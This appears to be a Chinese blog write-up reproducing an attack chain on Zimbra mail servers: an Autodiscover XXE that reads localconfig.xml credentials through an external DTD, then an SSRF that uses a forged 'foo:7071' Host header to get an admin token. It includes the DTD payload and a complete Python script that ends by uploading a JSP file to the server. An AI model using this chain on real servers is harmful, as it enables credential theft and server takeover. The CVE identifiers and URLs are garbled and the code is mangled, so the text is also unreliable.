前言
原文地址://03/a-saga-of-code-executions-on-zimbra.html
参考文档:/fnmsd/article/details/88657083
历史版本存在的RCE(远程代码执行)漏洞:
CVE--7091本地文件披露漏洞,影响范围为8.0.2以下版本。
CVE--9924 XXE SoapEngine文件漏洞,影响范围为8.5以下版本,结合SSRF可造成RCE。
CVE--9670 XXE Autodiscover文件漏洞,影响范围为8.5-8.7.11,结合SSRF可造成RCE。
至于在Zimbra 8.7.11-8.8.11版本上验证RCE,附加条件是Zimbra使用Memcached。
历史版本所有XXE漏洞:获取localconfig.xml
XML外部实体(XXE)攻击(有时称为XXE注入攻击)基于服务器端请求伪造。这种类型的攻击滥用了XML解析器广泛可用但很少使用的功能。使用XXE,攻击者能够导致拒绝服务(DoS)以及访问本地和远程内容和服务。在某些情况下,XXE甚至可以启用端口扫描并导致远程代码执行。有两种类型的XXE攻击:带内和带外。
Zimbra对其内部和外部操作使用大量的XML来处理,使用好XML文件会带来很大的XXE漏洞。
CVE--9924的漏洞位于SoapEngine.chooseFaultProtocolFromBadXml()中,该错误发生在invalid XML requests。此漏洞用于8.5以下的所有Zimbra实例版本。但由于无法将输出提取到HTTP response,因此在利用它时需要使用带外提取方法。
CVE--0漏洞是处理XMPP协议的XXE漏洞。
CVE--9670在处理Autodiscover requests时达到了XXE漏洞的要求,这可以在8.5到8.7.11的Zimbra上应用。CVE--9670的另一个缺陷是XHTML文档prevention bypass,这也导致了XXE,但是它们都是需要一些额外的条件来触发,这些都允许通过reponse直接提取文件。
一、CVE--9670 XXE漏洞
1、根据文章提示找到漏洞触发的源码
根据文章提示,CVE--9670在处理Autodiscover requsets时存在XXE漏洞,首先在内网的ubuntu 16.04LTS下安装zimbra 8.7.10版本,导出文件zimbra/lib/jar/zimbrastore.jar,利用java反编译器寻找关键字Autodiscover,发现此模块存在于com/zimbra/cs/service/AutoDiscoverServlet.class中。
向/Autodiscover/Autodiscover.xml 试着POST一个空的xml:
看到返回的是"No Email address is specified in the Request",于是在AutoDiscoverServlet.class中查找此语句,发现发送的Request主要是由此模块下的一个doPost函数来处理,doPost函数大致如下:
分析doPost代码,其利用模块下的getTagValue函数解析request,发现一共只解析两个参数,第一个是EMailAddress,也就是邮件用户名,第二个是AcceptableResponseSchema,而这个AcceptableResponseSchema是造成XXE漏洞的关键参数。
继续分析:
第一个if语句是判断邮件用户是否为空,并没有用户验证机制,所以只需随便构造一个邮箱用户就可以了。
第二个if语句的responseSchema为上文中获取的AcceptableResponseSchema标签下的参数,如果此参数不为两个给定的类型,则报错并返回responseSchema的内容,此处造成了回显式的XXE。
2、根据漏洞构造xml
由上文分析得出request只需要两个参数即可,所以利用此条件构造内部注入的xml:
在查询AutoDiscover的构造语句:
根据上图构造post语句,用RestClient插件发送post语句,如下图,XXE内部注入漏洞触发成功,返回文件内容:
由于localconfig.xml为XML文件,需要加上CDATA标签才能作为文本读取,由于XXE不能内部实体进行拼接,所以此处需要用外部dtd注入来触发XXE漏洞:
dtd文件:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml"><!ENTITY % start "<![CDATA["><!ENTITY % end "]]>"><!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
构造外网可访问的站点,上传dtd文件,构造外部注入的数据包,post发送返回localconfig.xml的内容:
在安装时,Zimbra为其内部SOAP通信设置了一个全局管理员,用户名为“zimbra”,并随机生成密码。这些信息均存储在名为localconfig.xml的本地文件中。分析了CVE--7091漏洞,某些条件下可以使用此类凭证来获得RCE。但是zimbra通过令牌管理用户权限,并设置了一个应用程序模型,使得管理令牌只能被授予进入管理端口的请求,默认情况下端口是7071,但是很多网站都没有开7071。
3、适用版本
经测试,适用版本为8.5-8.7.11,在8.8版本中,zimbra对AutoDiscover模块做了XML外部实体注入防护:
二、CVE--9621 SSRF漏洞
如果目标网站关闭了7071端口,那么还有其他的方法,那就是SSRF漏洞。文章中提到用ProxyServlet,利用反编译器找到此函数:
根据博客文章的说明,此ProxyServlet可以代理对另一个位置的请求,并且这个servlet可以在普通用户的webapp上使用,因此可以从公共访问。但是代码具有另外的保护,它会检查代理目标是否与一组预定义的白名单域匹配,也就是说请求来自管理员,所以第一步先要取到管理员作为普通用户的autotoken值。由于zimbra在管理员检查中存在缺陷,它检查的第一件事是请求是否来自端口7071,但是它使用的是ServletRequest.getServerPort()来获取传入的端口。利用管理员的检查缺陷,用cookie发送带有“foo:7071”主机头和低权限的autotoken值,我们可以将请求代理到任意目标。
1、获取低权限autotoken值
低权限token可以通过soap接口发送AuthRequest进行获取:
使用已经获得的zimbra_admin_name和zimbra_ldap_password进行登陆,获取一个低权限Token。
2、利用该token使用cookie发送“foo:7071”造成SSRF
编写python脚本
首先通过账号和加密口令先获取低权限口令,然后通过proxy接口,向/service/proxy?target=https://127.0.0.1:7071/service/admin/soap发送cookie,访问admin的soap接口获取高权限Token,获取权限然后实现文件上传。
#coding=utf8import requestsimport sysfrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)base_url=sys.argv[1]base_url=base_url.rstrip("/")#upload file name and contentfilename = "111.jsp"fileContent = r'<%out.println("111");%>'print(base_url)#low_token Stageimport reusername = "zimbra"password = "3Z0sGzkL"print(username)print(password)auth_body="""<soap:Envelope xmlns:soap="//05/soap-envelope">soap:Header<context xmlns="urn:zimbra"><userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/></context>/soap:Headersoap:Body<AuthRequest xmlns="{xmlns}"><account by="adminName">{username}</account><password>{password}</password></AuthRequest>/soap:Body/soap:Envelope"""print("[*] Get Low Privilege Auth Token")r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)pattern_auth_token=pile(r"<authToken>(.*?)</authToken>")print(pattern_auth_token)low_priv_token = pattern_auth_token.findall(r.text)[0]#print(low_priv_token)# SSRF+Get Admin_Token Stageheaders["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"headers["Host"]="foo:7071"print("[*] Get Admin Auth Token By SSRF")data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password)print(data)r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=data,headers=headers,verify=False)admin_token =pattern_auth_token.findall(r.text)[0]#print("ADMIN_TOKEN:"+admin_token)f = {'filename1':(None,"whocare",None),'clientFile':(filename,fileContent,"text/plain"),'requestId':(None,"12",None),}headers ={"Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"}print("[*] Uploading file")r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)print(r.text)print("Please vist "+base_url+"/downloads/"+filename)print("[*] Request Result:")s = requests.session()r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)print(r.text)print("May need cookie:")print(headers['Cookie'])
对目标进行SSRF漏洞测试:
发现jsp文件已经上传成功!
